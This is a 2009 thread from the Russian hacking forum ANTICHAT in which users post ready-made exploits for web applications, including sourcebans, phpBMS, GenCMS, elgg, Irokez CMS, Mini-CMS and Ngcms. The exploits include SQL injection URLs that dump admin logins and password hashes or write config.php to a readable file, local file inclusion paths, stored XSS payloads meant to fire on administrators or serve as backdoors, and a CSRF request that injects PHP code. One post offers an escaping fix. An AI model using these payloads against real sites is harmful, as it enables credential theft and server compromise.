ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.06.2009, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Программа: WebEyes Guest Book 3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjec ts
|
|
|
30.06.2009, 22:58
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
поисковик TSEP <=0.942.02
http://milw0rm.com/exploits/9057
|
|
|
|
Обзор уязвимостей sourcebans |
01.07.2009, 14:48
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Обзор уязвимостей sourcebans
Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон))
Офф сайт: sourcebans.net
Статистика уязвимостей
Всего уязвимостей найденно: 5
XSS: 3
MySql Error: 1
Плохая проверка данных: 1
1. ACTIVE XSS
Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php
Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID
Описание:
Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами)
Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss
Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)
2. ACTIVE XSS 2
Уязвимая страница: sait.ru/index.php
Проблемный файл: Точно не известно
Уязвимые поля: Intro Title
Описание:
В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить 
Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались)
3. ACTIVE XSS 3
Уязвимая страница: sait.ru/index.php?p=admin&c=mods
Проблемный файл: pages/admin.edit.mod.php
Уязвимые поля: Mod Name, Mod Folder
Описание:
Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян
Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)
4. MySql Error
Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php
Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value
Описание:
Описания нету
Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)
5. Не достаточная проверка данных
Уязвимая страница: sait.ru/index.php
Проблемный файл: includes/sb-callback.php
Уязвимые параметры: отсуствуют
Описание:
Не достаточная обработка при смене емаила
Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[])
Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans)
Автор уязвимости: Mr. Anonymous
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)
На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка
Последний раз редактировалось wolmer; 14.11.2009 в 16:27..
|
|
|
|
05.07.2009, 22:56
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
phpBMS v0.96
половина скриптов в дирах
Код:
phpBMS v0.96
phpbms.org
eLwaux(c)2009, uasc.org.ua
http://phpbms.org/trial/
## ## ##
SQL Inj
-----------------------------------------------------------------------------------------------
$querystatement="SELECT
if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
AS value FROM discounts WHERE id=".$_GET["id"];
$queryresult = $db->query($querystatement);
-----------------------------------------------------------------------------------------------
PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())
## ## ##
SQL Inj
\dbgraphic.php
-----------------------------------------------------------------------------------------------
$querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
".$_GET["t"]." WHERE id=".$_GET["r"];
$queryresult=$db->query($querystatement);
-----------------------------------------------------------------------------------------------
PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1
## ## ##
SQL Inj
-----------------------------------------------------------------------------------------------
if(isset($_GET["cmd"])){
switch($_GET["cmd"]){
case "show":
showSearch($_GET["tid"],$_GET["base"],$db);
break;
}//end switch
-----------------------------------------------------------------------------------------------
PoC:
/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2
## ## ##
pXSS
-----------------------------------------------------------------------------------------------
<form name="form1" method="post" action="<?php echo
$_SERVER["PHP_SELF"]?>">
-----------------------------------------------------------------------------------------------
PoC:
\index.php/"><script>alert(/xss/);</script><div id="
\modules\base\myaccount.php/"><script>alert(/xss/);</script><div id="
\phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div
id="
\phpbms\modules\base\tabledefs_options.php\">{XSS}
\phpbms\modules\base\adminsettings.php\">{XSS}
## ## ##
Path Disclosure
/footer.php
/header.php
/advancedsearch.php?cmd=show&
/choicelist.php
|
|
|
|
06.07.2009, 17:03
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
GenCMS
Код:
GenCMS
http://gencms.berlios.de/
eLwaux(c)2009
LFI
/show.php
----------------------------------------------------------------------------------------------------
18: $param = $_GET['p'];
19: if(empty($param)) $param = 'news';
20: //get right page
21: //$page = $param.'.php';
22:
23: //static or dynamic
24: if(GC_FULLSTATIC)
25: {
26: $page = $param.'.htm';
27: staticpage($page);
28: }
29: else
30: {
31: $page = GC_IPATH.'_base/sites/'.$param.'.php';
32: dynamicpage($page);
33: }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00
LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
14: if(!empty($_GET['step'])) $Step = $_GET['step'];
23: if ($Step == "2")
24: {
25: // allgemeine settings
26: //include blocks from template config
27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
28: $TPLBlocks = explode(';',$TemplateSettings);
29: }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
|
|
|
|
13.07.2009, 00:06
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
SqliteAdmin
CSRF
Код:
http://site/sqlitemanager/main.php?dbsel=1
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: 190.161.4.211
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://site/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save
|
|
|
|
27.07.2009, 18:38
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
elgg <= 1.5 vuln LFI
POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD
необходимо, чтоб в табл datalists
simplecache_enabled=0
(по дефолту =1 xD)
Код:
/_css/js.php:
33: $viewinput['view'] = 'js/' . $_GET['js'];
42: require_once(dirname(dirname(__FILE__)) . '/simplecache/view.php');
/simplecache/view.php:
26: $view = $viewinput['view'];
30: if (@mysql_select_db($CONFIG->dbname,$mysql_dblink)) {
48: if ($simplecache_enabled || $override) {
49: $filename = $dataroot . 'views_simplecache/' . md5($viewtype . $view);
51: $contents = file_get_contents($filename);
56: } else {
59: $contents = elgg_view($view);
/lib/elgglib.php:
237: function elgg_view($view, ..
317: foreach($viewlist as $priority => $view) {
321: if (file_exists($view_location . "{$viewtype}/{$view}.php") &&
!include($view_location . "{$viewtype}/{$view}.php")) {
|
|
|
|
Irokez CMS 0.7.1 SQL inlection |
05.08.2009, 10:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Irokez CMS 0.7.1 SQL inlection
Irokez CMS 0.7.1 SQL inlection
Уязвимость хранится в функции select() класса table.class.php. Дело в том, что передаваемые функцией параметры ничем не фильтруются.
Copeц бажной функции:
PHP код:
function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);
$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);
$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}
Условия:magic_quotes_gpc = Off
Эксплатация:
PHP код:
http://localhost/ru/news/7'+union+select+1,2,concat_ws(0x3a,login,pass),4,5,6,7,8,9,10,11,12+from+icm_users--+/?page=1
PHP код:
http://localhost/ru/polls/4'+AND+ascii(lower(substring(version(),1,1)))>5--+/
Для защиты данной функции можно использовать функцию mysql_escape_string()
Пример защиты:
PHP код:
function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$id = mysql_escape_string($id);
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);
$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);
$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}
=========================================
Оформленый эксплойт:
Код:
[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Irokez 0.7.1 SQL inlection]--------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Irokez 0.7.1 SQL inlection
[+] Autor: Ins3t
[+] Date:04.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability is caused by insufficient processing of select() function, which led to the SQL inj.
[+] Conditions: magic_quotes_gpc = Off
[+] Code vulnerable functions:
[+]-------------------------------------------------[COD]---------------------------------------------------------------[+]
function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);
$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);
$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}
[+]------------------------------------------------[/COD]--------------------------------------------------------------[+]
[+] Exploit:
[+]-------------------------------------------------[COD]---------------------------------------------------------------[+]
http://localhost/cms/ru/news/7'+union+select+1,2,concat_ws(0x3a,login,pass),4,5,6,7,8,9,10,11,12+from+icm_users--+/?page=1
[+]------------------------------------------------[/COD]--------------------------------------------------------------[+]
Последний раз редактировалось Ins3t; 05.08.2009 в 17:11..
|
|
|
|
09.08.2009, 01:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Mini-CMS 1.0.1 SQL inlection
Вот наткнулся на Mini-CMS 1.0.1, скачал, открыл первый попавшийся сорец, сразу понял, что CMS бажная..
Уязвимый файл: page.php
Фрагмент уязвимого кода:
PHP код:
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
WHERE id = $id";
$error = mysql_error();
if (!$result = mysql_query($query)) {
print "$error";
exit;
}
while($row = mysql_fetch_object($result)){
$content = $row->text;
print("$content");
}
?>
Требования: magic_quotes_gpc = Off и полный путь к config.php
Эксплатация уязвимости:
PHP код:
http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]/config.txt'--+
Пароли от админки не хранятся в базе данных, а хранятся в файле config.php, из за этого нам приходится записывать конфиг в текстовый файл ( хотя лутше уже шелл лить ).
Оформленый эксплойт:
Код:
[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Site: www.arthacking.net
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:
[+]-------------------------------------------------[COD]---------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
WHERE id = $id"; <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
print "$error";
exit;
}
while($row = mysql_fetch_object($result)){
$content = $row->text;
print("$content");
}
?>
[+]------------------------------------------------[/COD]---------------------------------------------------------------[+]
[+] Exploit:
[+]-------------------------------------------------[COD]---------------------------------------------------------------[+]
http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+
[+]------------------------------------------------[/COD]---------------------------------------------------------------[+]
Последний раз редактировалось Ins3t; 09.08.2009 в 01:13..
|
|
|
|
16.08.2009, 23:55
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Ngcms
XSS Активная (!)
Регестрируемся
В поле "Сайт" и "Откуда"
Код:
"><script>alert();</script>
При просмотре админом через админ панель ваш профайл, выполняется XSS.
PHP код:
$tvars['vars'] = array(
'php_self' => $PHP_SELF,
'sort_options' => $sort_options,
'how_options' => $how_options,
'npp_nav' => $npp_nav,
'entries' => $entries,
'per_page' => $per_page,
'name' => htmlspecialchars($_REQUEST['name']),
);
$tpl -> template('table', tpl_actions.$mod);
$tpl -> vars('table', $tvars);
echo $tpl -> show('table');
Ещё есть.
При добавление новости.
В краткое содержание или полное без разницы.
Код:
[img]javascript:alert('XSS')[/img]
PHP код:
$tvars['vars'] = array(
'php_self' => $PHP_SELF,
'changedate' => ChangeDate($row['postdate']),
'catlist' => makeCategoryList(array('skip' => $cats, 'nameval' => 1)),
'allcats' => @GetAllCategories($cats),
'comments' => $parse->smilies($comments),
'id' => $row['id'],
'title' => secure_html($row['title']),
'short' => secure_html($story[0]),
'full' => secure_html($story[1]),
'alt_name' => $row['alt_name'],
'avatar' => $row['avatar'],
'description' => secure_html($row['description']),
'keywords' => secure_html($row['keywords']),
'views' => $row['views']
);
PS
Уязвим везде параметр [IMG][/IMG]
(c) Ctacok. Специально для Античат.
Последний раз редактировалось Ctacok; 17.08.2009 в 00:22..
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.jpg?1383034){kind=avatar}
Комбинированный вид